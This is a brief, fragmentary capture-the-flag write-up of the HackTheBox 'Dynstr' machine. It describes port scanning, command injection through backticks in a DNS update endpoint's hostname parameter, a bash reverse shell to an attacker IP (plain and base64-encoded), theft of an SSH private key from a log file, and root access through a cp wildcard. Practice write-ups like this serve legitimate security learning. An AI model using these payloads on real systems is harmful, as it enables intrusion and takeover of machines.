DYNSTR

Scanning

NMAP

22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Enumeration

port 80

we have beta mode

Credentials dynadns:sndanyd

email

whatweb

after some directory busting

i found this http://dynstr.htb/nic/update

after some googling i found this page

lets preform this using BurpSuite ... you may get 911 [wrngdom: htb] so try to change hostname

with these values

Exploit

Test hostname Parameter by adding ; or `

we can use `` in hostname param without break logic

reverse shell bash -i >& /dev/tcp/10.10.16.17/4242 0>&1

base64 encode YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK to keep logic up

some bash to decode payload on target

if we try to send like that logic down

so use url encoding

add Authorization: Basic ZHluYWRuczpzbmRhbnlk header value = base64(dynadns:sndanyd)

setup listener and Send

Finally in πŸŽ‰

Getting User

there is 2 users bindmgr, dyna

in this directory /home/bindmgr/support-case-C62796521 we fine strace-C62796521.txt

cat strace-C62796521.txt

we find private key

copy it to attacker machine

chmod 600 pri_key

ssh targ not working ....

add ip zone

ssh again it works

Privilege Escalation

cat this script find this

this part is the key WILDCARD πŸ‘

if this line may looks confuse explain ⬇️

cp [source] [source] [destination]

cp .version * /etc/bind/named.bindmgr/

Last updated